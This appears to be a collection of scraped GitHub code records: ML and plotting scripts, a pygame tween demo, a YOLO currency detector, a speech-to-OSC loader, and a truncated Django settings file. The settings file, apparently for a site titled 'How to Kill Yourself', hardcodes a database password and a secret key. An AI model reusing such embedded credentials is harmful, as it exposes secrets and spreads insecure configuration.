1)\nplt.xlabel('Episode')\nplt.ylabel('Reward')\nplt.yscale('log')\nplt.show()\nplt.savefig('convergence.png')\n\nenv1.close()\n\n(obtained_rewards_random, env2) = Q1.simulate_random_strategy()\nplt.hist(obtained_rewards_random)\nplt.xlabel('Sum of rewards')\nplt.ylabel('Percentage')\nplt.savefig('histogram.png')\nplt.show()\n\n(obtained_rewards_optimal, env1) = Q1.simulate_learned_strategy()","repo_name":"Ancientkingg/cartpole","sub_path":"src/barebones-implementation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"73999938310","text":"#!/usr/bin/python\n# M.E.Farmer 2013\n# demo for tween library\n# showing integration with PyGame\n# moves text from random points using various tweens\n# changes from random color to random color using the same tween\n# Mouse click rotates through tweens and ESC closes demo\nimport sys\nimport pygame\nimport random\nimport tween\n\n\n# higher number equal slower transitions\n# stall/fps = seconds per transition\nstall=offset = 60\nFPS = 60\nBACKGROUND_COLOR = (0,0,0)\nsize = width, height = (800,600)\ntext_pos = (0,0)\ntext_color = (0,128,0)\n\ntweens = [\n (tween.easeLinear,\"easeLinear\"),\n (tween.easeInQuad,\"easeInQuad\"),\n (tween.easeInOutQuad,\"easeInOutQuad\"),\n (tween.easeOutQuad,\"easeOutQuad\"),\n (tween.easeInCubic,\"easeInCubic\"),\n (tween.easeInOutCubic,\"easeInOutCubic\"),\n (tween.easeOutCubic,\"easeOutCubic\"),\n (tween.easeInQuartic,\"easeInQuartic\"),\n (tween.easeInOutQuartic,\"easeInOutQuartic\"),\n (tween.easeOutQuartic,\"easeOutQuartic\"),\n (tween.easeInQuintic,\"easeInQuintic\"),\n (tween.easeInOutQuintic,\"easeInOutQuintic\"),\n (tween.easeOutQuintic,\"easeOutQuintic\"),\n (tween.easeInSine,\"easeInSine\"),\n (tween.easeInOutSine,\"easeInOutSine\"),\n (tween.easeOutSine,\"easeOutSine\"),\n (tween.easeInExpo,\"easeInExpo\"),\n (tween.easeInOutExpo,\"easeInOutExpo\"),\n (tween.easeOutExpo,\"easeOutExpo\"),\n (tween.easeInCirc,\"easeInCirc\"),\n (tween.easeInOutCirc,\"easeInOutCirc\"),\n (tween.easeOutCirc,\"easeOutCirc\"),\n (tween.easeInElasticBig,\"easeInElasticBig\"),\n (tween.easeOutElasticBig,\"easeOutElasticBig\"),\n (tween.easeInElasticSmall,\"easeInElasticSmall\"),\n (tween.easeOutElasticSmall,\"easeOutElasticSmall\"),\n (tween.easeLoop,\"easeLoop\"),\n (tween.easeInchWorm,\"easeInchWorm\"),\n (tween.customTween(\n \"b+c*(26.65*tc*ts + -91.5925*ts*ts + 115.285*tc + -62.89*ts + 13.5475*t)\"),\n \"customTween\")\n ]\n# setup the intial tween\ntween_index = 0\nease_func,text_displayed = tweens[tween_index]\n\npygame.init()\nscreen = pygame.display.set_mode(size,pygame.FULLSCREEN)\nFPSTICKER = pygame.time.Clock()\nfont = pygame.font.SysFont(\"comicsansms\",65)\ntext = font.render(text_displayed, True, text_color)\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n if tween_index == len(tweens)-1:\n tween_index=0\n else:\n tween_index+=1\n ease_func,text_displayed = tweens[tween_index]\n \n # set our stall counter to change the tween on next check\n stall = offset\n elif event.type == pygame.QUIT or (event.type == pygame.KEYDOWN\n and event.key == pygame.K_ESCAPE):\n sys.exit()\n screen.fill(BACKGROUND_COLOR)\n # the pygame clock runs faster than we want to update\n # our tweens so we just stall for a few cycles then\n # update and reset our counter \n stall+=1\n if stall >= offset:\n stall=0\n old_pos = text_pos\n text_pos = (random.randint(1,width),random.randint(1,height))\n # set a new tween function for the coordinates\n xy_out = tween.xyTween(ease_func,old_pos,text_pos,offset,False,True)\n ##x_out = tween.tween(tween.easeLoop,old_pos[0],text_pos[0],offset,False,True)\n ##y_out = tween.tween(tween.easeInElasticSmall,old_pos[1],text_pos[1],offset,False,True)\n old_color = text_color\n text_color = (random.randint(1,255),random.randint(1,255),random.randint(1,255))\n # set a new tween function for the text colors\n color_out = tween.colorTween(ease_func,old_color,text_color,offset,False,True)\n # every frame we just call .next() and the tween does the work\n text = font.render(text_displayed, True, (color_out.next()))\n screen.blit(text, xy_out.next())\n ##screen.blit(text, (x_out.next(),y_out.next()))\n pygame.display.flip()\n FPSTICKER.tick(FPS)\n \n","repo_name":"fenceFoil/canopto","sub_path":"tween_test_pygame.py","file_name":"tween_test_pygame.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31171459789","text":"from keras.layers import Input, Dense, Dropout,Activation,BatchNormalization\nfrom keras.models import Model, Sequential \nfrom keras.optimizers import SGD\nfrom keras.utils.vis_utils import plot_model\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping, ReduceLROnPlateau,History\nimport math\nadvanced_activations=('PReLU','LeakyRelU')\n\nclass SAE(object):\n \"\"\" \n Stacked autoencoders. It can be trained in layer-wise manner followed by end-to-end fine-tuning.\n For a 5-layer (including input layer) example:\n Autoendoers model: Input -> encoder_0->act -> encoder_1 -> decoder_1->act -> decoder_0;\n stack_0 model: Input->dropout -> encoder_0->act->dropout -> decoder_0;\n stack_1 model: encoder_0->act->dropout -> encoder_1->dropout -> decoder_1->act;\n \n Usage:\n from SAE import SAE\n sae = SAE(dims=[784, 500, 10]) # define a SAE with 5 layers\n sae.fit(x, epochs=100)\n features = sae.extract_feature(x)\n \n Arguments:\n dims: list of number of units in each layer of encoder. dims[0] is input dim, dims[-1] is units in hidden layer.\n The decoder is symmetric with encoder. So number of layers of the auto-encoder is 2*len(dims)-1\n act: activation (default='relu'), not applied to Input, Hidden and Output layers.\n drop_rate: drop ratio of Dropout for constructing denoising autoencoder 'stack_i' during layer-wise pretraining\n batch_size: batch size\n \"\"\"\n def __init__(self,\n dims,\n batchnorm=True,\n act='relu',\n actinlayercenter='tanh',\n drop_rate=0.2,\n batch_size=32,\n init=\"glorot_uniform\",\n use_earlyStop=False,\n save_dir='SAE_result_tmp'\n ): \n assert actinlayercenter in [\"tanh\",\"linear\"]\n self.dims=dims\n self.n_stacks=len(dims)-1\n self.n_layers=2*self.n_stacks\n self.batchnorm=True\n self.act='relu'\n self.actinlayercenter='tanh'\n self.drop_rate=drop_rate\n self.batch_size=batch_size,\n self.init=init\n self.use_earlyStop=use_earlyStop\n self.stacks=[self.make_stack(i) for i in range(self.n_stacks)]\n self.make_autoencoders()\n plot_model(self.autoencoders,show_shapes=True,to_file=\"autoendoers.png\")\n\n def make_autoencoders(self):\n \"\"\" Fully connected autoencoder model\n \"\"\"\n x=Input(shape=(self.dims[0],),name='input')\n h=x\n #encoder layer\n for i in range(self.n_stacks-1):\n h=Dense(self.dims[i+1],kernel_initializer=self.init,activation=None,name='encoder_%d'%i)(h)\n if self.batchnorm:\n h=BatchNormalization(center=True, scale=False)(h)\n if self.act in advanced_activations:\n h=keras.layers.__dict__[self.act](name='encoder_%d'%i)(h)\n else:\n h=Activation(self.act,name=\"act_encoder_%d\"%i)(h)\n #hidden layer, recommand to use a linear or tanh activation \n h=Dense(self.dims[-1],kernel_initializer=self.init,activation=None,name=\"encoder_%d\"%(self.n_stacks-1))(h)\n if self.batchnorm:\n h=BatchNormalization(center=True, scale=False)(h)\n h=Activation(self.actinlayercenter,name=\"act_center\")(h)\n #decoder layer\n for i in range(self.n_stacks-1,0,-1):\n h=Dense(self.dims[i],kernel_initializer=self.init,activation=None,name='decoder_%d'%i)(h)\n if self.batchnorm:\n h=BatchNormalization(center=True, scale=False)(h)\n if self.act in advanced_activations:\n h=keras.layers.__dict__[self.act](name='decoder_%d'%i)(h)\n else:\n h=Activation(self.act,name=\"act_decoder_%d\"%i)(h)\n #output\n h=Dense(self.dims[0],kernel_initializer=self.init,name=\"decoder_0\",activation=self.actinlayercenter)(h)\n #autoencodes\n self.autoencoders=Model(inputs=x,outputs=h,name=\"AE\")\n #get encoder\n self.encoder=self.get_encoder()\n \n def get_encoder(self):\n name=\"encoder_\"+str(self.n_stacks-1)\n ret= Model(inputs=self.autoencoders.input,\n outputs=self.autoencoders.get_layer(name).output,name=\"encoder\")\n return ret\n\n def make_stack(self,ith):\n \"\"\"\n Make the ith autoencoder for layer-wise pretrainning. It has single hidden layer. The input data is corrupted by Dropout(drop_rate) if self.drop_rate>0\n Arugumets:\n ith: int type, in range(0,self.n_stacks)\n \"\"\"\n in_out_dim=self.dims[ith]\n hidden_dim=self.dims[ith+1]\n in_act=self.actinlayercenter if ith==self.n_stacks-1 else self.act\n x=Input(shape=(in_out_dim,),name=\"input\")\n h=x\n #encoder stack layer \n if self.drop_rate>0.0:\n h = Dropout(self.drop_rate, name='encoder_dropout')(h)\n #h=Dense(units=hidden_dim,activation=None,kernel_initializer=self.init,kernel_regularizer=l1_l2(0.1,0.2,name='encoder_%d'%ith)\n h=Dense(units=hidden_dim,activation=None,kernel_initializer=self.init,name='encoder_%d'%ith)(h)\n if in_act in advanced_activations:\n h=keras.layers.__dict__[self.act](name='encoder_%d'%ith)(h)\n else:\n h=Activation(self.act,name='act_encoder_%d'%ith)(h)\n h=Dense(units=in_out_dim,activation=None,kernel_initializer=self.init,name='decoder_%d'%ith)(h)\n #decoder stack layer \n if self.drop_rate>0.0:\n h = Dropout(self.drop_rate, name='decoder_dropout')(h)\n if in_act in advanced_activations:\n h=keras.layers.__dict__[self.act](name='decoder_%d'%ith)(h)\n else:\n h=Activation(self.act,name=\"act_decoder_%d\"%ith)(h)\n model=Model(inputs=x,outputs=h)\n print(\"Heere\",model,type(model))\n return model\n\n def pretrain_stacks(self,x,epochs=200,decaying_step=4):\n \"\"\" \n Layer-wise pretraining. Each stack is trained for 'epochs' epochs using SGD with learning rate decaying 4\n times every 'epochs/4' epochs.\n \n Arguments:\n x: input data, shape=(n_samples, n_dims)\n decaying_step, default=4, \n epochs: epochs for each stack\n \"\"\"\n features=x\n print(type(features),features.shape)\n decaying_step=int(decaying_step)\n for i in range(self.n_stacks):\n #print('Pretraing the %dth layer...'%(i+1))\n print('Pretraing the %dth layer...'%i)\n for j in range(decaying_step):# learning rate multiple 0.1 every 'epochs/3' epochs\n print('learning rate=',pow(10,-1-j))\n self.stacks[i].compile(optimizer=SGD(pow(10,-1-j),momentum=0.9),loss='mse')\n if self.use_earlyStop is True:\n print(\"sdfsd\")\n callbacks=[EarlyStopping(monitor='loss',min_delta=1e-4,patience=10,verbose=1,mode='auto')]\n self.stacks[i].fit(features,features,callbacks=callbacks,batch_size=self.batch_size,epochs=math.ceil(epochs/decaying_step)) \n else:\n print(\"sdfsd222\")\n print(self.stacks[i])\n self.stacks[i].fit(x=features,y=features,batch_size=self.batch_size,epochs=math.ceil(epochs/4))\n print('The %dth has been pretrained successfully!!!!!'%(i+1))\n #update features to the inputs of the next stacked layer\n feature_model=Model(inputs=self.stacks[i].input, outputs=self.stacks[i].get_layer('encoder_%d'%i).output)\n features=feature_model.predict(features)\n print(\"All stacked autoencoder layers trained successfull!!!!\")\n \n def pretrain_autoencoders(self,x,epochs=300):\n \"\"\"\n Fine tune autoendoers end-to-end after layer-wise pretraining using 'pretrain_stacks()'\n Use SGD with learning rate = 0.1, decayed 10 times every 80 epochs\n \n Arguments: \n :param x: input data, shape=(n_samples, n_dims)\n :param epochs: training epochs\n \"\"\"\n print(\"Copy layer-wise pretrained weights to autoencoders\")\n for i in range(self.n_stacks):\n name='encoder_%d'%i\n self.autoencoders.get_layer(name).set_weights(self.stacks[i].get_layer(name).get_weights())\n name=\"decoder_%d\"%i\n self.autoencoders.get_layer(name).set_weights(self.stacks[i].get_layer(name).get_weights())\n print(\"Fine tunning autoendoer end to end!!\")\n for j in range(math.ceil(epochs/50)):\n lr=pow(10,-j-1)\n print(\"Fine tuning autoencoders with learning rate=\"+str(lr))\n self.autoencoders.compile(optimizer=SGD(lr, momentum=0.9), loss='mse')\n #early stopping\n if self.use_earlyStop is True:\n callbacks=[EarlyStopping(monitor='loss',min_delta=1e-4,patience=10,verbose=1,mode='auto')]\n self.autoencoders.fit(x=x, y=x, batch_size=self.batch_size,callbacks=callbacks, epochs=50)\n else:\n self.autoencoders.fit(x=x, y=x, batch_size=self.batch_size, epochs=50)\n\n def fit(self,x,epochs=200):\n self.pretrain_stacks(x,epochs=epochs)\n self.pretrain_autoencoders(x,epochs=epochs)\n \n\nif __name__=='__main__':\n \"\"\"\n An example for how to use SAE model on MNIST dataset. In terminal run\n python SAE.py\n \"\"\"\n import numpy as np\n def load_mnist():\n # the data, shuffled and split between train and test sets\n from keras.datasets import mnist\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x = np.concatenate((x_train, x_test))\n y = np.concatenate((y_train, y_test))\n x = x.reshape((x.shape[0], -1))\n x = np.divide(x, 50.) # normalize as it does in DEC paper\n print ('MNIST samples', x.shape)\n return x, y\n x,y=load_mnist()\n print(\"Test on x shape is \",x.shape)\n sae=SAE(dims=[x.shape[-1],64,32])\n sae.fit(x=x,epochs=150)\n #extract features\n features=sae.encoder.predict(x)\n \n\n\n\n \n\n \n\n \n \t\t\t\n\n\n\n\n","repo_name":"eleozzr/desc","sub_path":"desc/original/SAE-non.py","file_name":"SAE-non.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"27"} +{"seq_id":"71999981833","text":"import pandas as pd\nimport numpy as np\nfrom bokeh.plotting import figure\nfrom bokeh.io import output_file\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\nfrom bokeh.models import DataRange1d, Legend, ColumnDataSource\nfrom bokeh.models import PanTool, ResetTool, WheelZoomTool, HoverTool, LassoSelectTool, BoxSelectTool\n\n\ndf = pd.read_csv(\"WFPAfricaFinal.csv\")\ndf_2 = pd.read_csv(\"Ref_vs_Pop.csv\")\n\ncountries = df_2[\"Country\"].unique()\nmy_palette = ['goldenrod', 'forestgreen', 'black', 'blue', 'blueviolet', 'brown','crimson', \\\n'darkblue', 'darkcyan', 'darkgreen', 'limegreen', 'darkkhaki', 'darkred', 'darkseagreen', 'darkviolet', 'deeppink', \\\n'green', 'indigo', 'magenta', 'maroon', 'navy', 'orange', 'orchid', 'purple', \\\n'red', 'sienna', 'teal', 'turquoise', 'violet', 'yellow']\n\n\n# creates per country a multiline plot\n# which displays the price of products over time\nfOut = open(\"CountryChart.html\", \"a\")\nfor country in countries:\n legend_it = []\n products = df[\"food\"][df[\"country\"] == country].unique()\n f = figure(plot_width=1000, plot_height=650, title=country)\n for product, color in zip(products, my_palette):\n source = ColumnDataSource(name = 'data', data=dict(\n year = df[\"year\"][(df[\"country\"] == country) & (df[\"food\"] == product)],\n price_per_unit = df[\"price_per_unit\"][(df[\"country\"] == country) & (df[\"food\"] == product)]\n ))\n hover = HoverTool(tooltips=[\n (\"year\", \"@year\"),\n (\"price_per_unit\", \"@price_per_unit\")\n ], mode='vline')\n c = f.line(x='year', y='price_per_unit', line_width=2, color=color, legend=source.name, alpha=0.8, muted_color=color, muted_alpha=0.1, source=source)\n legend_it.append((product, [c]))\n f.toolbar.tools = [PanTool(), ResetTool(), WheelZoomTool(), hover, LassoSelectTool(), BoxSelectTool()]\n f.xaxis.axis_label=\"year\"\n f.yaxis.axis_label=\"price per unit\"\n legend = Legend(items=legend_it, location=(0, 10))\n legend.click_policy=\"hide\"\n f.legend.visible = False\n f.add_layout(legend, \"right\")\n html = file_html(f, CDN, \"CountryChart\")\n fOut.write(html)\nfOut.close()\n\n\n# # creates scatterplots between the rate of change of the number of refugees\n# # in percentage of the population of the country\n# # and the rate of change of the average price per country\n# fOut = open(\"Price_vs_refugee.html\", \"a\")\n# f = figure(plot_width=950, plot_height=450, title=\"price vs refugees\")\n# legend_it = []\n# for country, color in zip(countries, my_palette):\n# source = ColumnDataSource(name = \"data\", data=dict(\n# RefugeePercentagePopulation = df_2[\"Percent_ref_vs_pop\"][df_2[\"Country\"] == country],\n# RateOfChangePrice = df_2[\"Rate_of_change_price\"][df_2[\"Country\"] == country]\n# ))\n# f.xaxis.axis_label=\"refugees vs population\"\n# f.yaxis.axis_label=\"rate of change price\"\n# hover = HoverTool(tooltips=[\n# (\"refugees vs population\", \"@RefugeePercentagePopulation\"),\n# (\"rate of change price\", \"@RateOfChangePrice\")\n# ])\n# f.toolbar.tools = [PanTool(), ResetTool(), WheelZoomTool(), hover, LassoSelectTool(), BoxSelectTool()]\n# c = f.circle(x='RefugeePercentagePopulation', y='RateOfChangePrice', size=12, color=color, legend=source.name, source=source)\n# legend_it.append((country, [c]))\n# legend = Legend(items=legend_it, location=(0, 10))\n# legend.click_policy=\"hide\"\n# f.legend.visible=False\n# f.add_layout(legend, \"right\")\n# html = file_html(f, CDN, \"Price_vs_refugee\")\n# fOut.write(html)\n# fOut.close()\n","repo_name":"chrisalgerges98/DataProcessing","sub_path":"CSV database and Scripts/WFP_EDA.py","file_name":"WFP_EDA.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6530252789","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom ttkthemes import ThemedStyle\nimport cv2\nimport cvzone\nimport math\nfrom ultralytics import YOLO\n\napp = tk.Tk()\napp.title(\"Image Object Detection\")\nstyle = ThemedStyle(app)\nstyle.set_theme(\"arc\")\n\ncurrency_values = {\n \"Rs10\": 10,\n \"Rs20\": 20,\n \"Rs50\": 50,\n \"Rs100\": 100,\n \"Rs200\": 200,\n \"Rs500\": 500,\n \"Rs2000\": 2000\n}\n\nclassNames = [\"Rs10\", \"Rs20\", \"Rs50\", \"Rs100\", \"Rs200\", \"Rs500\", \"Rs2000\"]\n\n\n\ndef open_image():\n file_path = filedialog.askopenfilename(filetypes=[(\"Image Files\", \"*.jpg *.jpeg *.png\")])\n if file_path:\n start_detection(file_path)\n\ndef start_detection(image_path):\n img = cv2.imread(image_path)\n model = YOLO(\"../Yolo-Weights/best200on350.pt\") # Replace with the actual path\n\n total_sum = 0 # Initialize the total sum\n\n result = model(img)\n\n for r in result:\n boxes = r.boxes\n\n for box in boxes:\n conf = math.ceil((box.conf[0] * 100)) / 100\n if conf < 0.5:\n continue # Skip low-confidence detections\n x1, y1, x2, y2 = box.xyxy[0]\n x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n\n cls = int(box.cls[0])\n class_name = classNames[cls]\n\n if class_name in currency_values:\n currency_value = currency_values[class_name]\n total_sum += currency_value # Add currency value to total sum\n\n cvzone.putTextRect(img, f\"{class_name}\", (max(0, x1), max(20, y1)), scale=1, thickness=1)\n\n # Display total sum on the image\n cvzone.putTextRect(img, f\"Total: Rs{total_sum}\", (10, 50), scale=2, thickness=2)\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nlabel = tk.Label(app, text=\"Choose an image file for object detection\", font=(\"Helvetica\", 14))\nlabel.pack(pady=10)\n\nimage_button = tk.Button(app, text=\"Open Image File\", command=open_image, font=(\"Helvetica\", 12))\nimage_button.pack(pady=5)\n\napp.mainloop()\n","repo_name":"potato-lulw/IDvalidation","sub_path":"Yolo-With-Webcam/onlyPhotos.py","file_name":"onlyPhotos.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16144939459","text":"import threading\nimport time\nfrom pathlib import Path\nfrom threading import Thread\nimport speech_recognition as sr\nfrom read_time_stamp import seek_phrase\nimport pythonosc.udp_client\nimport logging\n\nlogging.getLogger().setLevel(logging.DEBUG)\n\nprint(sr.Microphone.list_microphone_names())\n\nclass SpeechBufLoader(Thread):\n\n def __init__(self, osc_send_ip=\"127.0.0.1\", osc_send_port=57120, phrase_time_limit=3,\n buf_length=48000*10, num_bufs=10, device_name=None):\n self.r = sr.Recognizer()\n self.m = sr.Microphone(\n sr.Microphone.list_microphone_names().index(device_name)\n if device_name is not None else None\n )\n self.osc_client = pythonosc.udp_client.SimpleUDPClient(osc_send_ip, osc_send_port)\n self.phrase_time_limit = phrase_time_limit\n self.buf_length = buf_length\n self.num_bufs = num_bufs\n self._current_buf = 0\n self._buf_lock = threading.Lock()\n super().__init__()\n\n def run(self) -> None:\n # while True:\n # value = input(\"Type something:\")\n # found_audio = seek_phrase(value)\n #\n # if found_audio is not None:\n # word, file_path, audio_pos = found_audio\n # logging.debug(f\"Recognized {word} at audio position {audio_pos} in {Path(file_path).name}\")\n # self.osc_client.send_message(r'/loadbuf',\n # [self._next_buf, file_path, int(audio_pos), self.buf_length])\n # threading.Thread(target=self._delayed_increment_buf).start()\n # else:\n # logging.debug(\"No words recognized in data set\")\n with self.m as source:\n self.r.adjust_for_ambient_noise(source)\n while True:\n with self.m as source:\n audio = self.r.listen(source, phrase_time_limit=3)\n try:\n # recognize speech using Google Speech Recognition\n value = self.r.recognize_google(audio, language=\"de\")\n logging.debug(f\"Recognized '{value}'\")\n\n found_audio = seek_phrase(value)\n\n if found_audio is not None:\n word, file_path, audio_pos = found_audio\n logging.debug(f\"Found {word} at audio position {audio_pos} in {Path(file_path).name}\")\n self.osc_client.send_message(r'/loadbuf',\n [self._current_buf, file_path, int(audio_pos), self.buf_length])\n threading.Thread(target=self._delayed_increment_buf).start()\n else:\n logging.debug(\"No words recognized in data set\")\n except sr.UnknownValueError:\n logging.debug(\"Oops! Didn't catch that\")\n except sr.RequestError as e:\n logging.debug(\"Uh oh! Couldn't request results from Google Speech Recognition service; {0}\".format(e))\n\n def _delayed_increment_buf(self):\n time.sleep(2)\n with self._buf_lock:\n self._current_buf = (self._current_buf + 1) % self.num_bufs\n\n def latest_buf(self):\n return self.get_buf(-1)\n\n def get_buf(self, offset=0):\n with self._buf_lock:\n return (self._current_buf + offset) % 10\n\n\nif __name__ == '__main__':\n sbl = SpeechBufLoader()\n sbl.start()\n while True:\n # print(sbl.latest_buf())\n time.sleep(0.1)\n","repo_name":"MarcTheSpark/bkp","sub_path":"Python/explorations/live_speech.py","file_name":"live_speech.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3765927907","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 27 13:16:54 2021\r\n\r\n@author: thors\r\n\"\"\"\r\n\r\nX = int(input())\r\nfor i in range(X):\r\n k = i+1\r\n n = int(input())\r\n x = [int(x) for x in input().split()]\r\n y = [int(x) for x in input().split()]\r\n \r\n #Til að finna minsta ScalarProduct\r\n x.sort()\r\n y.sort(reverse = True)\r\n \r\n scalarProd = 0\r\n for i in range(len(x)):\r\n scalarProd += x[i]*y[i]\r\n \r\n print(f'Case #{k}: {scalarProd}')\r\n","repo_name":"ths251/Kattis-Solution","sub_path":"MinimumScalarProduct.py","file_name":"MinimumScalarProduct.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72411393032","text":"import tensorflow as tf\r\nfrom tensorflow.keras import Model, layers, Sequential\r\nfrom tensorflow.keras.layers import Input\r\nfrom tensorflow.keras.constraints import max_norm\r\n\r\nfilters = 10\r\nkernel_size = 5\r\nbatchsz = 128\r\n\r\n\r\nclass MyCNN(Model):\r\n def __init__(self):\r\n super(MyCNN, self).__init__()\r\n self.conv = layers.Conv2D(filters, kernel_size, padding='valid')\r\n self.relu = layers.ReLU()\r\n self.drop = layers.Dropout(rate=0.5)\r\n self.flatten = layers.Flatten()\r\n self.d1 = layers.Dense(16, activation='relu')\r\n self.d2 = layers.Dense(1, activation='sigmoid')\r\n\r\n def call(self, x):\r\n x = self.conv(x)\r\n x = self.relu(x)\r\n x = self.drop(x)\r\n x = self.flatten(x)\r\n x = self.d1(x)\r\n y = self.d2(x)\r\n return y\r\n\r\n\r\nclass_model = MyCNN()\r\nclass_model.build(input_shape=(batchsz, 28, 28, 1))\r\nclass_model.summary()\r\n\r\n\r\nseq_model = Sequential([\r\n layers.Conv2D(filters, kernel_size, padding='valid', input_shape=(28, 28, 1)),\r\n layers.ReLU(),\r\n layers.Dropout(rate=0.5),\r\n layers.Flatten(),\r\n layers.Dense(16, activation='relu')\r\n])\r\nseq_model.add(layers.Dense(1, activation='sigmoid'))\r\nseq_model.summary() # 模型构建的三种方式:build, fit, input_shape=()\r\n","repo_name":"yxq9710/dataProcessAndModelReproduction","sub_path":"codes/bilstm_crf_CNN/MyCNN.py","file_name":"MyCNN.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20789767839","text":"import os\n\nPRODUCTION = os.environ.get(\"PRODUCTION\", \"\")\nDOCKER = os.environ.get(\"DOCKER\", \"\")\n\ngettext = lambda s: s\nPROJECT_PATH = os.path.realpath(os.path.dirname(__file__))\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSITE_ID = 1\nSITE = \"core\"\n\n\nALLOWED_HOSTS = [\n \"howtokillyourself.org\",\n \"dev.howtokillyourself.org\",\n \"localhost\",\n \"0.0.0.0\",\n]\n\n# Application definition\n\nINSTALLED_APPS = [\n #'djangocms_admin_style',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sitemaps',\n 'django.contrib.sites',\n\n # libraries\n 'taggit',\n 'modelcluster',\n\n # apps\n 'suicide_site',\n 'articles',\n\n # wagtail cms\n 'wagtail.wagtailforms',\n 'wagtail.wagtailredirects',\n 'wagtail.wagtailembeds',\n 'wagtail.wagtailsites',\n 'wagtail.wagtailusers',\n 'wagtail.wagtailsnippets',\n 'wagtail.wagtaildocs',\n 'wagtail.wagtailimages',\n 'wagtail.wagtailsearch',\n 'wagtail.wagtailadmin',\n 'wagtail.wagtailcore',\n]\n\nWAGTAIL_SITE_NAME = 'How to Kill Yourself'\n\nGEOIP_PATH = os.path.realpath(os.path.join(BASE_DIR, \"geoip/GeoLiteCity.dat\"))\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'wagtail.wagtailcore.middleware.SiteMiddleware',\n 'wagtail.wagtailredirects.middleware.RedirectMiddleware',\n]\n\nROOT_URLCONF = 'core_site.urls'\n\nTEMPLATE_DIRS = (\n PROJECT_PATH + '/templates/',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'core_site.context_processor.geoip',\n ],\n },\n },\n]\n\nCMS_TEMPLATES = (\n ('djangocms/cms.html', 'CMS Template'),\n ('djangocms/cms2.html', 'CMS Template v2'),\n)\n\nLANGUAGES = [\n ('en-us', 'English'),\n]\n\nWSGI_APPLICATION = 'core_site.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'suicide_db',\n 'USER': 'gregmccoy',\n 'PASSWORD': 'Conestoga1',\n 'HOST': 'localhost',\n 'PORT': 5432,\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(PROJECT_PATH, 'images')\nMEDIA_URL = \"/media/\"\n\nSTATIC_ROOT = \"/var/www/static/\"\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"templates/static\"),\n]\nSTATICFILES_STORAGE = \"django.contrib.staticfiles.storage.ManifestStaticFilesStorage\"\n\nif PRODUCTION:\n DEBUG = False\n from production_settings import *\nelse:\n DEBUG = True\n SECRET_KEY = '3$0+y($j4@22)e$3c=3j^!#pr&#mdc#%xvrp13b9$g4!kb*af8'\n\nif DOCKER:\n DATABASES[\"default\"][\"HOST\"] = 